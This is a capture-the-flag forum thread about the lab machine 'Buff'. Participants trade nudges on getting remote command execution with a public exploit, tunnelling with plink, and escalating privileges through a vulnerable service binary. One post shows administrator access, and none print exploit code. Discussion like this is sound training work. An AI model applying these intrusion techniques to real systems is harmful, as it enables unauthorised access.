Official Buff Discussion

Got the p**** connection through finally after talking to some old once! But the flow is not working properly they refuse the connection error

@juL9M4hnAa5T said:

Thanks for the input, I am looking for the default location but am coming up dry. I’ll spin the app up on a Virtual Machine to investigate further.

Update: According to the installer it should be in Apa\Ll\Pr******\C******\ but the folder Pr***** does not exist.

You are looking for where it is running, not the file on disk.

I am stuck at the rooting, well the only obvious exploit for me was the pl*****.x to attempt a Po*** For***
Everything went fine ’ Last login: Thu Aug 6 19:50:26 2020 from 10.10.10.198 ’
when trying to use winexe it asks me for a password ( I found nothing in the registry there is no default password )
Getting this Error when typing any password or leaving it blank
( ERROR: Failed to open connection - NT_STATUS_OBJECT_NAME_NOT_FOUND )

Am i in a rabbit hole or smth? any help will be appreciated
thanks in advance

@ElleuchX1 said:

Am i in a rabbit hole or smth? any help will be appreciated

I think you are in a rabbit hole. I cant guess what pl*****.****x**** is though.

If you are trying Po*** For*** and you are getting this Last login: Thu Aug 6 19:50:26 2020 from 10.10.10.198 or you need creds from the remote machine, something is very wrong.

Oh my Lord! Finally rooted. I’m fairly new, never done this kind of privesc, i didn’t know it was possible. thanks to all here for gentle nudges.
if you need some tips, you can DM me.

Type your comment> @TazWake said:

@ElleuchX1 said:

Am i in a rabbit hole or smth? any help will be appreciated

I think you are in a rabbit hole. I cant guess what pl*****.****x**** is though.

If you are trying Po*** For*** and you are getting this Last login: Thu Aug 6 19:50:26 2020 from 10.10.10.198 or you need creds from the remote machine, something is very wrong.
" plink "
Well… I found something interesting and a ready-to-use exploit
Should’ve focused more on enum from the start

C:\Windows\system32>whoami
whoami
buff\administrator

Hello everyone, having some issues with plink: cannot establish a connection because my password is incorrect?? However I don’t know which password I should put though :neutral:
Maybe someone could DM me so that I can ask questions/be more specific about my issue here.

@rastafrange said:

Hello everyone, having some issues with plink: cannot establish a connection because my password is incorrect?? However I don’t know which password I should put though :neutral:
Maybe someone could DM me so that I can ask questions/be more specific about my issue here.

Its the password for your account - think about where its connecting.

I think i know how to achieve root, but I would like to know if someone was able to spawn a working msf meterpreter. my attempts are not able to exec anything

@SpaceMoehre said:

I think i know how to achieve root, but I would like to know if someone was able to spawn a working msf meterpreter. my attempts are not able to exec anything

You don’t need MSF for this.

@TazWake said:

You don’t need MSF for this.

I know, but i want to. Getting deeper into msf might be helpful at some time. so i like to try at easy boxes. but the usual shell_to_meterpreter does not work

@SpaceMoehre said:

I know, but i want to. Getting deeper into msf might be helpful at some time. so i like to try at easy boxes. but the usual shell_to_meterpreter does not work

OK - that makes sense but it means you will probably have to experiment this as most people wont have gone for MSF.

It might be possible to change the privesc payload to call at meterpreter session and catch it with MSF>

Ok, so by now I think that in order to get root I need to exploit the vulnerability in CM_.exe and I’ve found it’s location on the machine. The problem is that when I run it, I can’t find it working on the expected port or any port after typing netstat -ano. However, I sometimes find that the expected port is being used by a process that immediately disappears afterwards. Can anyone help explain what’s going on? Thanks

The box’s name and picture are a hint for root if you’re stuck

I am trying to turn the fake shell into a real shell. I am reading the exploit from the db. Am I supposed to do the exploit manually thru burp suite to get a browser shell? I do not understand where to inject the malicious stuff, could someone give me a nudge on this? Can a real browser shell do file transfers unlike the fake shell?

@squirrelpizza said:

I am trying to turn the fake shell into a real shell. I am reading the exploit from the db.

If you’ve used the one I used, the explanation gives you an incorrect path to use. You need to read the source code to see how it is structured.

Am I supposed to do the exploit manually thru burp suite to get a browser shell?

No, unless you want to.

I do not understand where to inject the malicious stuff, could someone give me a nudge on this?

Read around the sixth line of the functional python code.

Can a real browser shell do file transfers unlike the fake shell?

I don’t know what a real browser shell is, but the Remote Command Execution you get using this exploit allows you to upload using OS-based tools.

I am trying to privesc but neither of the possible poc’s are working. Any hints?

@adidibra said:

I am trying to privesc but neither of the possible poc’s are working. Any hints?

How convinced are you that there are only two possible POCs? At a guess, it the two you’ve tried aren’t working, you need to try something else.

Type your comment> @TazWake said:

@adidibra said:

I am trying to privesc but neither of the possible poc’s are working. Any hints?

How convinced are you that there are only two possible POCs? At a guess, it the two you’ve tried aren’t working, you need to try something else.

I did not mention numbers of poc. I have tested all of them found in the public db. I do not think there is another way to privesc

@adidibra said:

I did not mention numbers of poc. I have taste all of them found in the public db. I do not think there is another way to privesc

Sorry, when you said “neither” I read that meaning two.

There is a public POC which allows privesc.